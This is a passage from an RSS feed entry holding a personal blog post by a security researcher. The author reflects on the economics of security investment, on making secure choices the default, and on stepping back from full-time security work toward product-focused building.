style="margin-right:0.2222em"></span><span class="mord text"><span class="mord"><span class="mord">cost&nbsp;of&nbsp;incident</span></span></span></span></span><span style="top:-2.41em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">&lt;</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord text"><span class="mord"><span class="mord">cost&nbsp;of&nbsp;investing&nbsp;in&nbsp;security</span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.25em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>And when the cost of doing nothing is lower than the cost of investing in security, the rational decision is to do nothing.</p>
<p>So to do good security, you probably need to reduce the cost of security. This means making it easy to do the right thing: in Ross Anderson's
<a href="https://www.cl.cam.ac.uk/teaching/2324/SWSecEng/">Software and Security Engineering</a> course, there was a lot of emphasis on making the secure
thing the easiest, or the default, thing to do without compromising on usability.</p>
<p>That means building tools that developers actually want to use, or something so low-friction that they don't even realise they're using it.
It means building security into the process from the start, and not as an afterthought.</p>
<h2>I can never truly quit security</h2>
<p>I don't think I can ever truly quit security. I still love doing it on the side with fun research projects and freelance pentesting work outside
of my day job or school. Besides, how do you "quit" something so fundamentally important to everything else you might do in tech?
But I'm ready to take a pause on popping shells all the time and start building things that last.</p>
<p>And there are so many things I take with me from my time in security. I've learnt how to think adversarially, which helps a lot in writing
good software. I've learnt how to communicate complex ideas in a way that's easy to understand. I've picked up an attention to detail
that I didn't have before. I've learnt how to learn.</p>
<p>I think this is probably a good balance. Doing security as both a hobby <em>and</em> a job is probably too much for me. I think the analogy "it's a marathon,
not a sprint" is very apt here. Unfortunately I'm at that age where I need to be a bit more realistic about what I want in my career, and I need to know
I will still enjoy what I'm doing 10 years down the line.</p>
<p>I'm still not <em>entirely</em> sure what I <em>do</em> want to do, but I know I've found a passion for being as close to the product as possible. I'm at my best
when I work on meaningful problems that serve a clear purpose in the world and where I can clearly see the impact of my work.</p>
<p>This has been a long and quite personal post, and I don't want to enforce any particular message on anyone. I just re-made my personal site and decided
it made sense to write my first post on where I'm at right now. Wherever you are at, I hope you're doing well, and I hope you're doing what you love!</p>
<p>Oh, and please remember to touch grass.</p>
<figure class="mx-auto"><img alt="Touch grass" loading="lazy" width="1440" height="1440" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fgrass.16107f69.jpg&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fgrass.16107f69.jpg&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fgrass.16107f69.jpg&amp;w=3840&amp;q=75"><figcaption class="text-center">Touch grass</figcaption></figure>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
    </channel>
</rss>